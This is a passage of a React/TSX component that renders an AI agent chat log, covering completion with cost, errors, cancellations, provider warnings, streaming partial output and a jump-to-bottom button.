          return <div key={ev.seq} className="text-center text-xs text-fg-muted">{t("chat.finished")} {p.costUsd !== null && <span dir="ltr">· {fmtCost(p.costUsd)}</span>}</div>;
        }
        if (ev.type === "run_error") return <Bubble key={ev.seq} side="agent" tone="danger"><span className="text-sm">{t("chat.failed")}: <span dir="ltr">{(ev.payload as { message: string | null }).message ?? ""}</span></span></Bubble>;
        if (ev.type === "run_cancelled") return <div key={ev.seq} className="text-center text-xs text-fg-muted">{t("chat.cancelled")}</div>;
        if (ev.type !== "provider") return null;
        const p = ev.payload as { type?: string; subtype?: string; result?: string; is_error?: boolean; text?: string };
        // a retry or fallback the provider recovered from, and an error its run went on past: orange, not red
        if (p.type === "notice") return <Bubble key={ev.seq} side="agent" tone="warn"><span dir="ltr" className="text-xs">⚠ {p.text}</span></Bubble>;
        if (p.type === "result" && p.is_error) return <Bubble key={ev.seq} side="agent" tone={recovered.has(ev.seq) ? "warn" : "danger"}><span dir="ltr" className="text-sm">{p.result ?? p.subtype}</span></Bubble>;
        return null;
      })}
      {running && splitMemoryBlocks(partial).text && <Bubble side="agent"><Md text={splitMemoryBlocks(partial).text} /></Bubble>}
      {running && !partial && <div className="text-xs text-fg-muted animate-pulse">{t("chat.working")}</div>}
      <div ref={endRef} />
      {unseen && (
        <button type="button" onClick={jump} className="sticky bottom-2 ms-auto flex items-center gap-1 rounded-full border border-border bg-surface px-3 py-1.5 text-xs shadow-md hover:bg-surface-2" aria-label={t("chat.jumpDown")}>
          <ArrowDown className="size-3.5" /> {t("chat.jumpDown")}
        </button>
      )}
    </div>
    </WorkspaceCtx.Provider>
  );
}
